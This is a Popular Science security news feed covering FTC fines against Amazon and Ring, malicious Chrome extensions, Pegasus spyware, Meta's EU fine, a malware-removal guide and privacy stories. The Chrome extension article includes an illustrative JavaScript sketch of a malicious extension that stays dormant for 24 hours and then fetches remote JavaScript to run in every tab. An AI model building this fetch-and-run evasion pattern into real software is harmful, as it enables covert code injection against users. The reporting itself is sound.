Security | Popular Science
https://www.popsci.com/category/security/
Awe-inspiring science reporting, technology news, and DIY projects. Skunks to space robots, primates to climates. That's Popular Science, 145 years strong.

An FTC one-two punch leaves Amazon and Ring with a $30 million fine
https://www.popsci.com/technology/ftc-amazon-ring-fines/ | Thu, 01 Jun 2023 20:00:00 +0000
Federal Trade Commission building exterior
The FTC is continuing to put the pressure on Amazon's business practices. Deposit Photos

The company and its home surveillance subsidiary are under fire for children's privacy law violations and mishandling data.

The post An FTC one-two punch leaves Amazon and Ring with a $30 million fine appeared first on Popular Science.


The Federal Trade Commission’s ongoing attempt to rein in Amazon entered a new phase this week, with the regulator recommending that both the company and its home surveillance subsidiary Ring receive multimillion-dollar fines in response to alleged data privacy violations.

According to an FTC statement released on Wednesday, Amazon disregarded children’s privacy laws by allegedly illegally retaining personal data and voice recordings via its Alexa software. Meanwhile, in a separate, same-day announcement, the commission claims Ring employees failed to stop hackers from gaining access to users’ cameras, while also illegally surveilling customers themselves.

Amazon relies on its Alexa service and Echo devices to collect massive amounts of consumer data, including geolocation data and voice recordings, which it then uses both to further train its algorithms and to hone its customer profiles. Some of Amazon’s Alexa-enabled products marketed directly to children and their parents collect data and voice recordings, which the company can purportedly retain indefinitely unless parents specifically request the information be deleted. According to the FTC, however, “even when a parent sought to delete that information … Amazon failed to delete transcripts of what kids said from all its databases.”

[Related: End-to-end encryption now available for most Ring devices.]

Regulators argued these privacy omissions directly violate the Children’s Online Privacy Protection Act (COPPA) Rule. First established in 1998, the COPPA Rule requires websites and online services aimed at children under 13 to notify parents about the information they collect, as well as obtain parental consent.

According to the complaint, Amazon claimed children’s voice recordings were retained to help Alexa respond to vocal commands, improve its speech recognition and processing abilities, and allow parents to review them. “Children’s speech patterns and accents differ from those of adults, so the unlawfully retained voice recordings provided Amazon with a valuable database for training the Alexa algorithm to understand children, benefitting its bottom line at the expense of children’s privacy,” argues the FTC.

“Amazon’s history of misleading parents, keeping children’s recordings indefinitely, and flouting parents’ deletion requests violated COPPA and sacrificed privacy for profits,” said Samuel Levine, Director of the FTC’s Bureau of Consumer Protection, in Wednesday’s announcement. “COPPA does not allow companies to keep children’s data forever for any reason, and certainly not to train their algorithms.”

[Related: Amazon’s new warehouse employee training exec used to manage private prisons.]

The FTC’s proposed order includes deleting all relevant data alongside a $25 million civil penalty. Additionally, Amazon would be prohibited from using customers’ (including children’s) voice information and geolocation data once consumers request its deletion. The company would also be compelled to delete inactive children’s Alexa accounts, prohibited from misrepresenting its privacy policies, and required to create and implement a privacy program specifically governing its use of geolocation data.

Meanwhile, the FTC simultaneously issued charges against Amazon-owned Ring, claiming the smart home security company allowed “any employee or contractor” to access customers’ private videos, and failed to implement “basic privacy and security protections” against hackers. In one instance offered by the FTC, a Ring employee “viewed thousands” of videos belonging to female Ring camera owners set up in spaces such as bathrooms and bedrooms. Even after imposing restrictions on customer video access following the incident, the FTC alleges the company couldn’t determine how many other workers engaged in similar conduct “because Ring failed to implement basic measures to monitor and detect employees’ video access.”

[Related: Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks.]

The FTC’s proposed order against Ring would require the company to pay $5.8 million in fines to be directed towards consumer refunds. The company would also be compelled to delete any data, including facial information, amassed prior to 2018.

Amazon purchased Ring in 2018, and has since vastly expanded its footprint within the home surveillance industry. In that time, however, the company has come under fire on numerous occasions for providing video files to law enforcement without consumers’ knowledge, for lax security, and for promoting products via its much-criticized found-footage reality TV show, Ring Nation.


Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

This PDF Chrome extension might contain malware
https://www.popsci.com/technology/chrome-extension-malware-pdf-toolbox/ | Thu, 01 Jun 2023 18:00:00 +0000
chrome browser icons
Growtika / Unsplash

The extension could be used to access every web page you currently have open in your browser.

The post This PDF Chrome extension might contain malware appeared first on Popular Science.


An independent security researcher has found malicious code in 18 Chrome extensions currently available in the Chrome Web Store. Combined, the extensions have over 57 million active users. It’s yet more evidence that Chrome extensions need to be evaluated with a critical eye. 

Chrome extensions are apps built on top of Google Chrome that add extra features to your browser. These features are wide-ranging: popular extensions can auto-fill your passwords, block ads, enable one-click access to your to-do list, or change how a social media site looks. Unfortunately, because Chrome extensions are so powerful and can have so much control over your browsing experience, they are a popular target for hackers and other bad actors.

Earlier this month, independent security researcher Wladimir Palant discovered code in a browser extension called PDF Toolbox that allows it to inject malicious JavaScript code into any website you visit. The extension purports to be a basic PDF processor that can do things like convert other documents to PDF, merge two PDFs into one, and download PDFs from open tabs. 

It’s that last feature that leaves PDF Toolbox open to abuse. Google requires extension developers to request only the minimum permissions necessary. But in order to download PDFs from tabs that aren’t currently active, PDF Toolbox has to be able to access every web page you currently have open. Without that feature to point to, the extension would have no pseudo-legitimate justification for such broad access to your browser.
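To illustrate what that kind of access looks like, here is a hypothetical Manifest V3 fragment for an extension requesting sweeping permissions. The name and exact permission set are illustrative assumptions, not PDF Toolbox's actual manifest:

```json
{
  "name": "Example PDF Utility",
  "manifest_version": 3,
  "permissions": ["tabs", "scripting"],
  "host_permissions": ["<all_urls>"]
}
```

A `host_permissions` entry of `<all_urls>` lets an extension read and modify every page you visit, which is why a plausible-sounding feature can serve as cover for far broader data access.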

While PDF Toolbox seemingly can do all the PDF tasks it claims to be able to, it also downloads and runs a JavaScript file from an external website which could contain code to do almost anything, including capture everything you type into your browser, redirect you to fake websites, and take control of what you see on the web. By making the malicious code resemble a legitimate API call, obfuscating it so that it’s hard to follow, and delaying the malicious call for 24 hours, PDF Toolbox has been able to avoid being removed from the Chrome Web Store by Google since it was last updated in January 2022. (It is still available there at the time of writing, despite Palant lodging a report about its malicious code.) 
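The 24-hour dormancy trick described above can be sketched in a few lines. Everything here is a hypothetical illustration of the general pattern, not the extension's actual code; the function names and the idea of a disguised "config" download are assumptions based on Palant's description:

```javascript
// Hypothetical sketch of the dormancy-and-fetch pattern -- not PDF
// Toolbox's actual code. Waiting at least 24 hours after install before
// contacting the remote server helps the extension evade automated review.

const DELAY_MS = 24 * 60 * 60 * 1000; // 24-hour dormancy window

// Returns true once enough time has passed since install
// for the malicious payload to activate.
function shouldActivate(installTimeMs, nowMs) {
  return nowMs - installTimeMs >= DELAY_MS;
}

// Disguised payload download: it looks like an ordinary request for a
// configuration file, but the response body is arbitrary JavaScript
// that the extension can then run in every open tab.
async function fetchRemoteConfig(configUrl) {
  const response = await fetch(configUrl); // attacker-controlled domain
  return response.text();
}
```

Because the first 24 hours look entirely benign, a reviewer who installs the extension and tests it immediately sees only legitimate PDF behavior.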

Palant had no way of confirming what the malicious code in PDF Toolbox did when he first discovered it. However yesterday, he disclosed 17 more browser extensions that use the same trick to download and run a JavaScript file. These include Autoskip for Youtube, Crystal Ad block, Brisk VPN, Clipboard Helper, Maxi Refresher, Quick Translation, Easyview Reader view, Zoom Plus, Base Image Downloader, Clickish fun cursors, Maximum Color Changer for Youtube, Readl Reader mode, Image download center, Font Customizer, Easy Undo Closed Tabs, OneCleaner, and Repeat button, though it is likely that there are other infected extensions. These were only the ones that Palant found in a sample of approximately 1,000 extensions.

In addition to finding more affected extensions, Palant was able to confirm what the malicious code was doing (or at least had done in the past). The extensions were redirecting users’ Google searches to third-party search engines, likely in return for a small affiliate fee. By infecting millions of users, the developers could rake in a tidy amount of profit. 

Unfortunately, code injection is code injection. Just because the malicious JavaScript redirected Google searches fairly harmlessly to alternative search engines in the past doesn’t mean it does so today. “There are way more dangerous things one can do with the power to inject arbitrary JavaScript code into each and every website,” writes Palant.

And what kind of dangerous things are those? Well, the extensions could be collecting browser data, adding extra ads to every web page someone visits, or even recording online banking credentials and credit card numbers. Malicious JavaScript running unchecked in your web browser can be incredibly powerful. 

If you have one of the affected extensions installed on your computer, you should remove it now. It’s also a good idea to do a quick audit of all the other extensions you have installed to make sure you still use them and that they all appear legitimate. If not, you should remove them too.

Otherwise, treat this as a reminder to always be vigilant for potential malware. For more tips on how to fight it, check out our guide on removing malware from your computer.

Big Tech’s latest AI doomsday warning might be more of the same hype
https://www.popsci.com/technology/ai-warning-critics/ | Wed, 31 May 2023 14:00:00 +0000
Critics say current harms of AI include amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption. Photo by Jaap Arriens/NurPhoto via Getty Images

On Tuesday, a group including AI's leading minds proclaimed that we are facing an 'extinction crisis.'

The post Big Tech’s latest AI doomsday warning might be more of the same hype appeared first on Popular Science.


Over 350 AI researchers, ethicists, engineers, and company executives co-signed a 22-word, single-sentence statement about artificial intelligence’s potential existential risks for humanity. Compiled by the nonprofit Center for AI Safety, the statement drew signatories including the “Godfather of AI” Geoffrey Hinton, OpenAI CEO Sam Altman, and Microsoft Chief Technology Officer Kevin Scott, all of whom agree that “Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war.”

The 22-word missive and its endorsements echo a similar, slightly lengthier joint letter released earlier this year calling for a six-month “moratorium” on research into developing AI more powerful than OpenAI’s GPT-4. Such a moratorium has yet to be implemented.

[Related: There’s a glaring issue with the AI moratorium letter.]

Speaking with The New York Times on Tuesday, Center for AI Safety’s executive director Dan Hendrycks described the open letter as a “coming out” for some industry leaders. “There’s a very common misconception, even in the AI community, that there only are a handful of doomers. But, in fact, many people privately would express concerns about these things,” added Hendrycks.

But critics remain wary of both the motivations behind such public statements, as well as their feasibility.

“Don’t be fooled: it’s self-serving hype disguised as raising the alarm,” says Dylan Baker, a research engineer at the Distributed AI Research Institute (DAIR), an organization promoting ethical AI development. Speaking with PopSci, Baker went on to argue that the current discussions regarding hypothetical existential risks distract the public and regulators from “the concrete harms of AI today.” Such harms include “amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption.”

In a separate response, first published by DAIR following March’s open letter and re-upped on Tuesday, the group argues, “The harms from so-called AI are real and present and follow from the acts of people and corporations deploying automated systems. Regulatory efforts should focus on transparency, accountability and preventing exploitative labor practices.”

Hendrycks, however, believes that “just as it would be reckless to exclusively prioritize present harms, it would also be reckless to ignore them as well.” Hendrycks likened the moment to when atomic scientists warned the world about the technologies they created before quoting J. Robert Oppenheimer, “We knew the world would not be the same.”

[Related: OpenAI’s newest ChatGPT update can still spread conspiracy theories.]

“They are essentially saying ‘hold me back!’” media and tech theorist Douglas Rushkoff wrote in an essay published on Tuesday. He added that a combination of “hype, ill-will, marketing, and paranoia” is fueling AI coverage, and hiding the technology’s very real, demonstrable issues while companies attempt to consolidate their holds on the industry. “It’s just a form of bluffing,” he wrote. “Sorry, but I’m just not buying it.”

In a separate email to PopSci, Rushkoff summarized his thoughts, “If I had to make a quote proportionately short to their proclamation, I’d just say: They mean well. Most of them.”

A notorious spyware program was deployed during war for the first time
https://www.popsci.com/technology/pegasus-spyware-war/ | Thu, 25 May 2023 18:00:00 +0000
Building rubble from missile strike
Nov 05, 2020: Civilian building hit by Azerbaijani armed forces during a missile strike on the villages near Stepanakert. Deposit Photos

An Israeli tech company's Pegasus spyware was detected on the phones of Armenian journalists and other civilians critical of Azerbaijan's incursion.

The post A notorious spyware program was deployed during war for the first time appeared first on Popular Science.


The notorious Pegasus spyware developed by the Israeli tech company NSO Group has allegedly been used for the first time as a weapon against civilians in an international conflict. According to a new report, the software is being used to spy on experts, journalists, and others critical of Azerbaijan’s incursion into the territories of Nagorno-Karabakh in Armenia.

Reports of potentially the first documented case of a sovereign state utilizing the commercial spyware during a cross-border conflict come courtesy of the digital rights group Access Now, in collaboration with CyberHUB-AM, the University of Toronto’s Citizen Lab at the Munk School of Global Affairs, Amnesty International’s Security Lab, and independent mobile security researcher Ruben Muradyan.

[Related: You need to protect yourself from zero-click attacks.]

According to the research team’s findings published on Thursday, at least 12 individuals’ Apple devices were targets of the spyware between October 2020 and December 2022, including journalists, activists, a government worker, and Armenia’s “human rights ombudsperson.” Once a device is infected with the Pegasus software, third parties can access text messages, emails, and photos, as well as activate its microphone and camera to secretly record communications.

Although Access Now and its partners cannot conclusively link these attacks to a “specific [sic] governmental actor,” the “Armenia spyware victims’ work and the timing of the targeting strongly suggest that the conflict was the reason for the targeting,” they write in the report. As TechCrunch also noted on Thursday, The Pegasus Project, monitoring the spyware’s international usage, previously determined that Azerbaijan is one of NSO Group’s customers.

[Related: Why you need to update your Apple products’ software ASAP.]

Based in Israel, NSO Group claims to provide “best-in-class technology to help government agencies detect and prevent terrorism and crime.” The group has long faced intense international criticism, blacklisting, and lawsuits for its role in facilitating state actors with invasive surveillance tools. Pegasus is perhaps its most infamous product, and offers what is known as a “zero-click” hack. In 2021, PopSci explained:

Unlike the type of viruses you might have seen in movies, this one doesn’t spread. It is targeted at a single phone number or device, because it is sold by a for-profit company with no incentive to make the virus easily spreadable. Less sophisticated versions of Pegasus may have required users to do something to compromise their devices, like click on a link sent to them from an unknown number. 

In September 2021, the University of Toronto’s Citizen Lab discovered NSO Group’s Pegasus spyware on a Saudi Arabian activist’s iPhone, spyware that may have proved instrumental in the assassination of US-based Saudi critic Jamal Khashoggi. The discovery quickly prompted Apple to release a security patch to its over 1.65 billion users. Later that year the US Department of Commerce added NSO Group to its “Entity List for Malicious Cyber Activities.”

“Helping attack those already experiencing violence is a despicable act, even for a company like NSO Group,” Access Now’s senior humanitarian officer, Giulio Coppi, said in a statement. “Inserting harmful spyware technology into the Armenia-Azerbaijan conflict shows a complete disregard for safety and welfare, and truly unmasks how depraved priorities can be. People must come before profit—it’s time to disarm spyware globally.”

Meta fined record $1.3 billion for not meeting EU data privacy standards
https://www.popsci.com/technology/meta-facebook-record-fine/ | Mon, 22 May 2023 16:00:00 +0000
Facebook webpage showing unavailable account error message.
Ireland’s DPC has determined Facebook’s data transfer protocols to the US do not “address the risks to the fundamental rights and freedoms” of EU residents. Deposit Photos

Despite the massive penalty, little may change so long as US data law remains lax.

The post Meta fined record $1.3 billion for not meeting EU data privacy standards appeared first on Popular Science.


Ireland’s Data Protection Commission (DPC) slapped Meta with a record-shattering $1.3 billion (€1.2 billion) fine Monday alongside an order to cease transferring EU users’ Facebook data to US servers. But despite the latest massive penalty, some legal experts warn little will likely change within Meta’s overall approach to data privacy as long as US digital protections remain lax.

The fine caps a saga initiated nearly a decade ago by whistleblower Edward Snowden’s damning reveal of American digital mass surveillance programs. Since then, data privacy law within the EU has changed dramatically following the 2016 passage of its General Data Protection Regulation (GDPR). After years of legal back-and-forth in the EU, Ireland’s DPC has determined Facebook’s data transfer protocols to the US do not “address the risks to the fundamental rights and freedoms” of EU residents. In particular, the courts determined EU citizens’ information could be susceptible to US surveillance program scrapes, and thus violate the GDPR.

[Related: A massive data leak just cost Meta $275 million.]

User data underpins a massive percentage of revenue for tech companies like Meta, as it is employed to build highly detailed, targeted consumer profiles for advertising. Because of this, Meta has fought tooth-and-nail to maintain its ability to transfer global user data back to the US. In a statement attributed to Meta’s President of Global Affairs Nick Clegg and Chief Legal Officer Jennifer Newstead, the company plans to immediately pursue a legal stay “given the harm that these orders would cause, including to the millions of people who use Facebook every day.” The Meta representatives also stated “no immediate disruption” would occur for European Facebook users.

As The Verge notes, there are a number of caveats, even if Meta’s attempt at a legal stay falls apart. First, the DPC’s decision pertains only to Facebook, and not Meta’s other platforms such as WhatsApp and Instagram. Next, Meta has a five-month grace period to cease future data transfers, alongside a six-month deadline to purge the EU user data it currently holds in the US. Finally, the EU and the US are in the midst of negotiating a new data transfer deal that could be finalized as soon as October.

[Related: EU fines Meta for forcing users to accept personalized ads.]

Regardless, even with the record-breaking fine, some policy experts are skeptical of the penalty’s influence on Meta’s data policy. Over the weekend, a senior fellow at the Irish Council for Civil Liberties told The Guardian that, “A billion-euro parking ticket is of no consequence to a company that earns many more billions by parking illegally.” Although some states including California, Utah, and Colorado have passed their own privacy laws, comprehensive US protections remain stalled at the federal level. 

How to remove malware from your suffering computer
https://www.popsci.com/remove-malware-from-computer/ | Sat, 28 Aug 2021 19:00:00 +0000
A person sitting in front of a laptop that has a skull and crossbones in green code on the screen, indicating that it may have been infected with malware that they'll now need to remove.
All is not lost if you've been hit by malware. Alejandro Escamilla / Unsplash; Geralt / Pixabay

Getting rid of malicious software isn't as difficult as it may seem.

The post How to remove malware from your suffering computer appeared first on Popular Science.


Disaster has struck—a nasty piece of malware has taken root on your computer, and you need to remove it. Viruses can cause serious damage, but you might be able to get your computer back on its feet without too much difficulty, thanks to an array of helpful tools.

We’re using the term malware to refer to all kinds of malicious programs, whether they’re viruses, ransomware, adware, or something else. Each of these threats has its own definition, but the terms are often used interchangeably and can mean different things to different people. So for simplicity’s sake, when we say malware, we mean everything you don’t want on your computer, from a virus that tries to delete your files to an adware program that’s tracking your web browsing.

With so many types of malware and so many different system setups out there, we can’t cover every scenario. Still, we can give you some general malware removal pointers that should help you get the assistance you need.

First, identify the problem

When malware hits, you sometimes get a threatening error message—but sometimes you don’t. So keep an eye out for red flags, such as an uncharacteristically slow computer, a web browser inundated by endless pop-ups, and applications that just keep crashing.

Most machines have some kind of antivirus security protection, even if it’s just the Windows Defender tool built into Windows 10 or 11. Extra security software isn’t as essential on macOS—its integrated defenses are very effective—but that doesn’t mean a clever bit of malware can’t get access.

Windows Defender, an antivirus program that will help you remove malware from Windows computers.
Windows Defender offers competent basic malware protection for Windows 10 and 11. David Nield for Popular Science

If you do have a security tool installed, make sure you keep it up to date. Then, when you suspect you’ve been hit, run a thorough system scan—the app itself should have instructions for how to do so. This is always the first step in weeding out unwanted programs.

[Related: How to make sure no one is spying on your computer]

You might find that your installed security software spots the problem and effectively removes the malware on its own. In that case, you can get on with watching Netflix or checking your email without further interference. Unfortunately, if your antivirus software of choice doesn’t see anything wrong or can’t deal with what it’s found, you have more work to do.

Deal with specific threats

If your computer is displaying specific symptoms—such as a message with a particular error code or a threatening ransomware alert—run a web search to get more information. And if you suspect your main machine is infected and potentially causing problems with your web browser, you should search for answers on your phone or another computer.

Telling you to search online for help may seem like we’re trying to pass the buck, but this is often the best way to deal with the biggest and newest threats. To remove malware that has overwhelmed your computer’s built-in virus protections, you’ll probably need to follow specific instructions. Otherwise, you could inadvertently make the situation worse.

As soon as new threats are identified, security firms are quick to publish fixes and tools. This means it’s important to stay in touch with the latest tech news as it happens. If your existing antivirus program is coming up blank, check online to see if companies have released bespoke repair tools that you can use to deal with whatever problem you’re having.

Finally, based on what your research and antivirus scans tell you, consider disconnecting your computer from the internet to stop any bugs from spreading, or shutting down your machine completely to protect against file damage.

Try on-demand tools that will remove tricky malware

At this point, you’ve scanned your computer for malware using your normal security software and done some research into what might be happening. If you’ve still got a problem or your searches are coming up blank, you can find on-demand malware scanners online. These programs don’t require much in the way of installation, and they can act as useful “second opinions” to your existing anti-malware apps.

Tools such as Microsoft Safety Scanner, Spybot Search and Destroy, Bitdefender Virus Scanner (also for macOS), Kaspersky Security Scan, Avira PC Cleaner, Malwarebytes, and others can parachute onto your system for extra support. There, they’ll troubleshoot problems and give your existing security tools a helping hand.

Microsoft Safety Scanner, an antivirus program that will help you remove malware.
On-demand scanners, like Microsoft Safety Scanner, will take another pass at your applications and files and likely get rid of any malware that’s particularly troublesome. David Nield for Popular Science

Another reason to use extra software is that whatever nasty code has taken root on your system might be stopping your regular security tools from working properly. It could even be blocking your access to the web. In the latter case, you should use another computer to download one of these on-demand programs onto a USB stick, then transfer the software over to the machine you’re having problems with.

[Related: How to safely find out what’s on a mysterious USB device]

All of the apps listed above will do a thorough job of scanning your computer and removing any malware they find. To make extra sure, you can always run scans from a couple of different tools. If your computer has been infected, these apps will most likely be able to spot the problem and deal with it, or at least give you further instructions.

Once your existing security tools and an on-demand scanner or two have given your system a clean bill of health, you’re probably (though not definitely) in the clear. That means that any continued errors or crashes could be due to other factors—anything from a badly installed update to a failing hard drive.

Delete apps and consider resetting your system

Once you’ve exhausted the security-software solutions, you still have a couple of other options. One possibility: Hunt through your installed apps and browser extensions and uninstall any you don’t recognize or need. The problem with this method is that you could accidentally delete a piece of software that turns out to be vital. So, if you go down this route, make sure to do extra research online to figure out whether or not the apps and add-ons you’re looking at seem trustworthy.

A more drastic—but extremely effective—course of action is to wipe your computer, reinstall your operating system, and start again from scratch. Although this will delete all your personal files, it should hopefully remove malware and other unwanted programs at the same time. Before you take this step, make sure all your important files and folders are backed up somewhere else, and ensure that you’ll be able to download all your applications again.
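Backing up before a wipe is easy to script so nothing gets forgotten. Here's a minimal Python sketch (the folder names in the comment are examples; a dedicated backup tool or cloud sync is still the more robust option):

```python
import shutil
from pathlib import Path

def back_up(folders, destination):
    """Copy each folder into destination/<name>, overwriting stale copies."""
    dest = Path(destination)
    dest.mkdir(parents=True, exist_ok=True)
    for folder in folders:
        src = Path(folder).expanduser()
        shutil.copytree(src, dest / src.name, dirs_exist_ok=True)

# Example: back_up(["~/Documents", "~/Pictures"], "/Volumes/BackupDrive/pre-wipe")
```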

The options for reinstalling Windows 10.
Resetting and reinstalling your operating system is always an option, but it could erase your files along with any malware if you don’t prepare properly. David Nield for Popular Science

Reinstalling the operating system and getting your computer back to its factory condition is actually much easier than it used to be. We have our own guide for resetting Windows 10 and 11, and Apple has instructions for macOS. If you need more pointers, you can find plenty of extra information online.

That’s it! Through a combination of bespoke removal methods, existing security software, on-demand scanners, and (if necessary) a system wipe, you should now have effectively removed whatever malware had taken root on your system. At this point, if you’re still struggling, it’s time to call in the experts. IT repair specialists in your area may be able to lend a hand.

How to prevent future problems

Proactively protecting your computer against malware is a whole ‘nother story, but here’s a quick run-down of the basics. Be careful with the links and attachments you open and the files you allow on your computer. Remember that most viruses and malware will find their way to your computer through your email or web browser, so make sure you use some common sense and are cautious about what you click on and download. You should also take care to keep your online accounts safe and secure.
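Some of that common sense can even be written down as rough heuristics. The Python sketch below flags a few classic warning signs in a link; it's purely illustrative, and a URL that raises no flags is not necessarily safe:

```python
import ipaddress
from urllib.parse import urlsplit

def link_red_flags(url):
    """Return a list of rough warning signs; an empty list is NOT proof of safety."""
    flags = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme != "https":
        flags.append("not served over HTTPS")
    try:
        ipaddress.ip_address(host)
        flags.append("raw IP address instead of a domain name")
    except ValueError:
        pass
    if "xn--" in host:
        flags.append("punycode domain (possible look-alike characters)")
    if parts.username is not None:
        flags.append("credentials embedded before the hostname")
    return flags

print(link_red_flags("http://192.0.2.7/login"))  # flags HTTP and the raw IP
```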

Next, install a solid security tool you can trust. For Windows 10 and 11, the built-in Windows Defender program is a competent antivirus tool even if you don't add anything else. That said, you can opt to bolster your machine's defenses by paying for extra software from the likes of Norton, Avast, and many others. While the number of shady programs targeting Apple computers is on the rise, Macs are still generally more secure than Windows machines. The general consensus is that macOS is mostly safe from harm, provided you only install programs through the App Store and apply plenty of common sense. That means you should avoid following shady links or plugging in strange USB drives you've found lying in the street.

Finally, make sure your software is always patched and up to date. Most browsers and operating systems will update automatically in the background, but you can check for pending patches on Windows 10 by opening Settings and clicking Update & security (on Windows 11 it’s Settings > Windows Update). If you have a macOS computer, just open up the App Store and switch to the Updates tab to see if anything is available that you haven’t downloaded.

It’s difficult to give a prescriptive setup for every system and every user, but you should always remember that 100 percent effective protection is hard to guarantee. Always stay on your guard.

This story has been updated. It was originally published on May 17, 2017.

The post How to remove malware from your suffering computer appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Montana is the first state to ‘ban’ TikTok, but it’s complicated https://www.popsci.com/technology/montana-tiktok-ban-law/ Thu, 18 May 2023 15:00:00 +0000 https://www.popsci.com/?p=541964
TikTok brand logo on the screen of Apple iPhone on top of laptop keyboard
Critics argue a ban on TikTok is a violation of the First Amendment. Deposit Photos

The law is scheduled to go into effect next year, although it remains unclear how it could actually be enforced.

The post Montana is the first state to ‘ban’ TikTok, but it’s complicated appeared first on Popular Science.


Montana Governor Greg Gianforte signed a bill into law on Wednesday banning TikTok within the entire state, all but ensuring a legal, political, and sheer logistical battle over the popular social media platform's usage and accessibility.

In a tweet on Wednesday, Gianforte claimed the new law is an effort to “protect Montanans’ personal and private data from the Chinese Communist Party.” Critics and security experts, however, argue the app’s blacklisting infringes on residents’ right to free speech, and would do little to actually guard individuals’ private data.

“This unconstitutional ban undermines the free speech and association of Montana TikTok users and intrudes on TikTok's interest in disseminating its users' videos,” the digital rights advocacy organization Electronic Frontier Foundation argued in a statement posted to Twitter, calling the new law a “blatant violation of the First Amendment.”

[Related: Why some US lawmakers want to ban TikTok.]

According to the EFF and other advocacy groups, Montana's TikTok ban won't actually protect residents from companies and bad actors who can still scrape and subsequently monetize their private data. Instead, advocates renewed their call for legislators to pass comprehensive data privacy laws akin to the European Union's General Data Protection Regulation. Similar laws have passed in states like California, Colorado, and Utah, but continue to stall at the federal level.

“We want to reassure Montanans that they can continue using TikTok to express themselves, earn a living and find community as we continue working to defend the rights of our users inside and outside of Montana,” TikTok spokesperson Brooke Oberwetter stated on Wednesday.

Montana's new law is primarily focused on TikTok's accessibility via app stores from tech providers like Apple and Google, which are directed to block all downloads of the social media platform once the ban goes into effect at the beginning of 2024. Montanans themselves are not subject to the $10,000-per-day fine for continuing to access TikTok—rather, the penalty is levied against companies such as Google, Apple, and TikTok's owner, ByteDance.

[Related: The best VPNs of 2023.]

That said, there is no clear legal way to force Montanans to delete the app if it is already on their phones. Likewise, proxy services such as VPNs could easily skirt the ban. As The Guardian noted on Thursday, actually enforcing a wholesale ban on the app is all but impossible, barring the state adopting censorship tactics used by nations such as China.

“With this ban, Governor Gianforte and the Montana legislature have trampled on the free speech of hundreds of thousands of Montanans who use the app to express themselves, gather information, and run their small business in the name of anti-Chinese sentiment,” Keegan Medrano, policy director at the ACLU of Montana, said in a statement. “We will never trade our First Amendment rights for cheap political points.”

Read the fine print before signing up for a free Telly smart TV https://www.popsci.com/technology/telly-free-smart-tv/ Wed, 17 May 2023 16:00:00 +0000 https://www.popsci.com/?p=541666
Telly dual-screen smart TV mounted on wall
Telly will give you a free smart TV in exchange for pop-up ads and quite a bit of your personal data. Telly

Your personal data is the price you'll pay for the double-screened television.

The post Read the fine print before signing up for a free Telly smart TV appeared first on Popular Science.


Nothing in this life is free, especially a “free” 55-inch television. On Monday, a new startup called Telly announced plans to provide half-a-million smart TVs to consumers free-of-charge. But there’s a catch—underneath the sizable 4K HDR primary screen and accompanying five-driver soundbar is a second, smaller screen meant to constantly display advertisements alongside other widgets like stock prices and weather forecasts. The tradeoff for a constant stream of Pizza Hut offers and car insurance deals, therefore, is a technically commercial-free streaming experience. Basically, it swaps out commercial breaks for a steady montage of pop-up ads.

Whether or not this kind of entertainment experience is for you is a matter of personal preference, but be forewarned: Even after you agree to a constant barrage of commercials, Telly's “free” televisions make sure they pay for themselves through what appears to be an extremely lax, legally questionable privacy policy.

[Related: FTC sues data broker for selling information, including abortion clinic visits.]

As first highlighted by journalist Shoshana Wodinsky and subsequently boosted by TechCrunch on Tuesday, Telly's original privacy fine print was apparently a typo-laden draft, complete with an editorial comment about deleting children's personal data that asked, “Do wehave [sic] to say we will delete the information or is there another way around…”

According to a statement provided to TechCrunch by Telly's chief strategy officer Dallas Lawrence, the questions within the concerning, since-revised policy draft “appear a bit out of context,” and there's a perfectly logical explanation for them:

“The team was unclear about how much time we had to delete any data we may inadvertently capture on children under 13,” wrote Lawrence, who added, “The term ‘quickly as possible’ that was included in the draft language seemed vague and undetermined and needing [sic] further clarification from a technical perspective.”

[Related: This app helped police plan raids. Hackers just made the data public.]

But even without the troubling wording, Telly's privacy policy also discloses that it collects such information as names, email addresses, phone numbers, ages, genders, ethnicities, and precise geolocations. At one point, the policy stated it might collect data pertaining to one's “sex life or sexual orientation,” although TechCrunch notes this stipulation has since been “quietly removed.”

User data troves are often essential to tech companies' finances, as they can be sold to any number of third parties for lucrative sums. Most often, this information is used to build extremely detailed consumer profiles that customize ad experiences, but there are numerous instances of data caches being provided to law enforcement agencies without users' knowledge, as well as of hacker groups and other bad actors obtaining the personal information.

Telly is still taking reservations for its “free” smart TVs, but as the old adage goes: Buyer beware. And even when you’re not technically “buying” it, you’re certainly paying for it.

A free IRS e-filing tax service could start rolling out next year https://www.popsci.com/technology/irs-free-tax-file/ Tue, 16 May 2023 16:00:00 +0000 https://www.popsci.com/?p=541377
Close up of female hand using calculator atop tax forms.
The IRS may test a new free filing system in January 2024. Deposit Photos

Free tax filing for everyone in the US could be a step closer to reality.

The post A free IRS e-filing tax service could start rolling out next year appeared first on Popular Science.


Rumors of a free national tax e-filing service have surfaced repeatedly over the past couple of years, and it sounds like the US could be one step closer to making it a reality. As The Washington Post first reported on Monday, the IRS plans to test a digital tax filing prototype with a small group of Americans at the onset of the 2024 tax season—but just how much of your biometric data is needed to use the service remains to be seen.

Although the IRS offers a Free File system for people below a certain income level (roughly 70 percent of the population), the Government Accountability Office estimates less than three percent of US tax filers actually utilize the service. The vast majority of Americans instead rely on third-party filing programs, either in the form of online services like Intuit TurboTax and H&R Block, or via third-party CPAs. The $11 billion private tax filing industry has come under intense scrutiny and subsequent litigation in recent years for allegedly misleading consumers away from free filing options to premium services. Last November, an investigation into multiple major third-party tax filing services’ data privacy policies revealed the companies previously provided sensitive personal data to Facebook via its Meta Pixel tracking code.

[Related: Major tax-filing sites routinely shared users’ financial info with Facebook.]

According to The Washington Post’s interviews with anonymous sources familiar with the situation, the IRS is developing the program alongside the White House’s technology consulting agency, the US Digital Service. A dedicated universal free filing portal would add the US to the list of nations that already provide similar options, including Australia, Chile, and Estonia.

Last year, the IRS found itself facing a barrage of criticism after announcing, then walking back, a new policy that would have required US citizens to submit a selfie via ID.me to access their tax information. ID.me is a third-party verification service used extensively by state and federal organizations, as well as private companies, for identity proofing, authentication, and group affiliation via a combination of photo uploads and video chat confirmations. Using ID.me is currently one of multiple verification options for the IRS. It is unclear whether such a process will be mandatory within a future federal free filing portal. Neither the IRS nor the US Treasury Department had responded to requests for clarification at the time of writing.

